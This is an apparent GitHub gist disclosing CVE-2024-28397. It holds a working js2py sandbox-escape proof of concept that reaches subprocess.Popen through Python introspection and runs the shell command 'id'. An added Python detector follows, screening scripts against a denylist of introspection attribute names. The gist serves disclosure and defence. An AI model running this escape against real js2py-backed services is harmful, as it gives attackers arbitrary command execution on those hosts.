@win3zz
Created June 19, 2024 13:38
CVE-2024-28397: js2py (JS interpreter) Sandbox Escape, bypassing restrictions to execute commands.

import js2py

js_code = """

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

let obj = Object.getOwnPropertyNames({}).__getattribute__("__getattribute__")("__class__").__base__
output = findpopen(obj)("id", -1, null, -1, -1, -1, null, null, true).communicate()
console.log(output)

"""
repr(js2py.eval_js(js_code))
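
For defenders: the escape above works by reaching Python introspection attributes from JavaScript, so script text submitted to a js2py-backed service can be screened for those names before or after the fact. The following is an added example, not part of the original gist or of js2py; the function names are hypothetical, the sample inputs are constructed, and the attribute list extends the four names used in the gist with related ones as an assumption.

```python
import re

# Python introspection attributes that ordinary JavaScript has no reason to
# name. The first four appear in the gist; the rest are added as an assumption.
SUSPICIOUS = (
    "__getattribute__", "__class__", "__base__", "__subclasses__",
    "__bases__", "__mro__", "__globals__", "__builtins__", "__import__",
)

# JS string escapes that can spell a name without the literal text.
_ESCAPES = re.compile(
    r"\\u\{([0-9a-fA-F]{1,6})\}|\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})"
)
# Adjacent string literals joined with "+", e.g. "__cl" + "ass__".
_CONCAT = re.compile(r"""["']\s*\+\s*["']""")


def normalize(js_source: str) -> str:
    """Undo simple escape and concatenation tricks before matching."""
    def decode(match):
        digits = next(g for g in match.groups() if g is not None)
        codepoint = int(digits, 16)
        # Leave out-of-range escapes untouched instead of raising.
        return chr(codepoint) if codepoint <= 0x10FFFF else match.group(0)

    return _CONCAT.sub("", _ESCAPES.sub(decode, js_source))


def find_python_introspection(js_source: str) -> list[str]:
    """Return the suspicious attribute names referenced in js_source."""
    text = normalize(js_source)
    return [name for name in SUSPICIOUS if name in text]


# Constructed sample inputs (not taken from real traffic).
BENIGN = "function add(a, b) { return a + b } add(2, 3)"
PROBE = 'Object.getOwnPropertyNames({}).__getattribute__("__class__")'
OBFUSCATED = r'var k = "__cl" + "ass__"; var s = "\u005f_subclasses__"; o[k][s]'

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("probe", PROBE),
                       ("obfuscated", OBFUSCATED)):
        hits = find_python_introspection(src)
        print(f"{label}: {'REJECT ' + ', '.join(hits) if hits else 'no match'}")
```

A match is a reason to reject or investigate the input; no match does not make the input safe to evaluate, because a denylist over source text can be bypassed.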